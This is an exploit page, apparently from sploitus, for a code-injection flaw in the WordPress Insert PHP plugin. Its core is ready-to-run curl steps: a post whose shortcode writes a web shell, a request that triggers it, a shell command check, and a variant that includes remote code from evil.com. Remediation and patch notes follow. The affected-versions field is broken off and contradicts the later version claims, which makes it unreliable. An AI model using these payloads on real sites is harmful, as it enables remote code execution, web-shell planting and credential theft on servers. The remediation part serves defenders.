Exploit for CVE-2017-20251

## https://sploitus.com/exploit?id=8476D214-A11C-54A2-97EC-85289AF07ED0
# CVE-2017-20251: Insert PHP Plugin PHP Code Injection

## Vulnerability Title
Unauthenticated PHP Code Injection via Shortcode Processing in Insert PHP Plugin

## Basic Information

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2017-20251 |
| **Plugin** | Insert PHP (now Woody Code Snippets) |
| **Affected Versions** | = 4.7, authentication is required for REST API post creation

## Impact

**Severity: Critical**

Full Remote Code Execution (RCE) on the web server:

- Execute arbitrary PHP code on the server
- Read/write any file accessible to the web server user
- Access database credentials from wp-config.php
- Install web shells or backdoors
- Pivot to other systems
- Complete compromise of confidentiality, integrity, and availability

## PoC - Curl Commands

### Step 1: Create a Post with Malicious Shortcode (Authenticated)

```bash
curl -s -k -X POST "https://yorbit7.ddev.site/wp-json/wp/v2/posts" \
  -H "Content-Type: application/json" \
  -u "USERNAME:APPLICATION_PASSWORD" \
  -d '{
    "title": "Malicious Post",
    "content": "[insert_php]file_put_contents(\"/var/www/html/shell.php\",\"\");[/insert_php]",
    "status": "publish"
  }'
```

### Step 2: Visit the Post to Trigger Code Execution

```bash
curl -s -k "https://yorbit7.ddev.site/?p=POST_ID"
```

### Step 3: Verify Code Execution

```bash
curl -s -k "https://yorbit7.ddev.site/shell.php?cmd=id"
```

### Alternative: Direct eval() Test (Simple Proof)

```bash
# Create post
curl -s -k -X POST "https://yorbit7.ddev.site/wp-json/wp/v2/posts" \
  -H "Content-Type: application/json" \
  -u "USERNAME:APPLICATION_PASSWORD" \
  -d '{"title":"RCE Test","content":"[insert_php]file_put_contents(\"/var/www/html/rce_poc.txt\",\"RCE-SUCCESS\");[/insert_php]","status":"publish"}'

# Trigger
curl -s -k "https://yorbit7.ddev.site/?p=POST_ID"

# Verify
cat /var/www/html/rce_poc.txt  # Should output: RCE-SUCCESS
```

### Exploit-DB Reference (Unauthenticated, WP < 4.7)

For older WordPress versions where the REST API allowed unauthenticated post creation:

```bash
curl -s -k -X POST "/wp-json/wp/v2/posts/1234" \
  -H "Host: target.com" \
  -H "Content-Type: application/json" \
  -d '{
    "id": "1234ffff",
    "title": "by Hacker",
    "content": "[insert_php]include(\"http://evil.com/file.php\");[/insert_php]"
  }'
```

## Response Example

When the vulnerable shortcode is processed, the PHP code inside is executed by eval(). For the marker file test:

```
Request: Create post with [insert_php]file_put_contents("marker.txt","SUCCESS");[/insert_php]
Response: Post created successfully

Request: GET /?p=POST_ID
Response: Page renders, PHP code executes, marker.txt created on server

Verification:
$ cat /var/www/html/marker.txt
SUCCESS
```

## Recommended Remediation

1. **Immediate**: Uninstall the Insert PHP plugin or upgrade to version 3.3.1 or later
2. **Alternative Plugin**: Use a modern code snippet plugin like WPCode that uses safe execution contexts
3. **If Must Use PHP Snippets**: Ensure only trusted administrators can create/edit posts, and consider disabling the REST API for non-admins
4. **Hardening**: Set `DISALLOW_UNFILTERED_HTML` constant (though this doesn't fully mitigate the issue)

### Patch Analysis

The patched version (3.3.1+):
- Renamed shortcode from `[insert_php]` to `[wbcr_php_snippet]`
- Removed direct `eval()` usage in favor of a safe execution context
- Added authentication checks on REST API endpoints
- Implemented snippet ID validation before execution

## References

- [Exploit-DB 41308](https://www.exploit-db.com/exploits/41308)
- [NVD CVE-2017-20251](https://nvd.nist.gov/vuln/detail/CVE-2017-20251)
- [WordPress Plugin Page](https://wordpress.org/plugins/insert-php/)
- [CWE-94: Code Injection](https://cwe.mitre.org/data/definitions/94.html)